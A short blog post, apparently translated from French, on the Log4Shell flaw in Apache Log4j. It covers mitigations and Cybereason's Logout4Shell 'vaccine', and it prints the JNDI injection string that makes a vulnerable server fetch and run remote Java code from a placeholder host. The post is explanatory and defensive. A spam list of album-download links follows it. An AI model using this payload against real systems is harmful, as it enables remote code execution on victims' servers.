If you are a little interested in computer security, it will not have escaped you that on December 9, a 0day flaw affecting Apache Log4j had been disclosed. Called Log4Shell, this flaw which affects log4j from version 2.0 to 2.14.1 obtained a CVSS score of 10/10 in terms of severity.
Woohoo.
It transpires a lot everywhere, especially since the flaw is currently in use. To make it short, all you have to do is pass the following characters in the logs analyzed by log4j.
${jndi:ldap://URL.com/FICHIER_JAVA}and this will have the effect of downloading and executing the java file which is at the end of the url “URL.com/FICHIER_JAVA”. It is as simple as it is dramatic.
There is a lot of literature on this in particular on the side of CERT-FR so I’m not going to dwell on the subject, but an interesting and fun Github project grew out of all this mess.
As you know, to patch this Log4Shell vulnerability (CVE-2021-44228), it is urgent to update log4j to a version> = 2.15.0.
And if this is not possible:
For applications using versions 2.10.0 and later of the log4j library, it is also possible to guard against any attack by modifying the configuration parameter log4j2.formatMsgNoLookups to the value true, for example when launching the Java virtual machine with the option -Dlog4j2.formatMsgNoLookups = true. Another alternative is to delete the class JndiLookup in the parameter classpath to eliminate the main attack vector (the researchers do not rule out the existence of another attack vector).
But another possibility is to let nature take its course and this is what Cybereason offers with this code called Logout4Shell which exploits the Log4Shell vulnerability to … simply patch it.
The payload which is loaded via the flaw will force the Log4j recorder to reconfigure itself to switch the parameter which goes well to True and will thus prevent any subsequent exploitation via this attack.
It’s a kind of cyber vaccine while waiting for a real update of Log4j.
If you are interested, the code is available on Github.
Good luck to those impacted.
To read also:
Download Ingested – The Level Above Human Album Mp3 Zip
Download Joss Stone – The Soul Sessions, Vol. 2 (Deluxe Edition) Album Mp3 Zip
Download Various Artists – Best of Classic Rock Album Mp3 Zip
Download Mc Janik – Set up Album Mp3 Zip
Download Gas – Rausch Album Mp3 Zip
Download Gonjasufi – A Sufi and a Killer (Bonus Track Version) Album Mp3 Zip
Download Jazz Sabbath – Jazz Sabbath Album Mp3 Zip
Download Herbert von Karajan & Berliner Philharmoniker – Beethoven: 9 Symphonies (Recordings from 1961-62) Album Mp3 Zip
Download HammerFall – Dominion Album Mp3 Zip
Download Claustrofobia – Swamp Loco – EP Album Mp3 Zip
Download Aṣa – Lucid Album Mp3 Zip
Download Eagles of Death Metal – Zipper Down Album Mp3 Zip
Download Roy Ayers, Ali Shaheed Muhammad & Adrian Younge – Jazz Is Dead 002 Album Mp3 Zip
Download AmaLee – Hourglass – EP Album Mp3 Zip
Download DISH// – Junkfood Junction Album Mp3 Zip
Download Royalty Free Sound Effects Factory – Nature Sound Effects Album Mp3 Zip
Download Various Artists – Sick Music 2018 Album Mp3 Zip
Download Jimmy Cliff – The Harder They Come (Soundtrack) Album Mp3 Zip
Download Iseo & Dodosound – Roots in the Air Album Mp3 Zip
Download André Hazes Jr. – Leef Album Mp3 Zip
Download Jon Batiste – Chronology of a Dream (Live at the Village Vanguard) Album Mp3 Zip
Download Cripple Bastards – La fine cresce da dentro Album Mp3 Zip
Download Joyce Jonathan – Une place pour moi Album Mp3 Zip
Download Mercer – Neo Disco 2 – EP Album Mp3 Zip
Download Prime Circle – Let the Night In (DeluXe Edition) Album Mp3 Zip